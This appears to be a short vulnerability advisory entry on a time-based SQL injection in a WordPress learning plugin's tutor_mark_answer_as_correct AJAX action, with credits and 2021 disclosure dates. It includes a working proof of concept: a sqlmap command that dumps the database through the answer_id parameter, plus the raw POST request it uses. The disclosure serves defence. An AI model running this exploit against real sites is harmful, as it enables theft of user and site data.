The tutor_mark_answer_as_correct AJAX action from the plugin was vulnerable to blind and time based SQL injections that could be exploited by students.
python3 sqlmap.py -r ~/tutortime.txt --dbms=mysql --technique=T -p answer_id --dump Where tutortime.txt is POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [URL] Content-Length: 74 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [URL] Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close action=tutor_mark_answer_as_correct&answer_id=1&inputValue=1
Chloe Chamberland
Chloe Chamberland
Yes
2021-03-15 (about 2 years ago)
2021-03-15 (about 2 years ago)
2021-03-20 (about 2 years ago)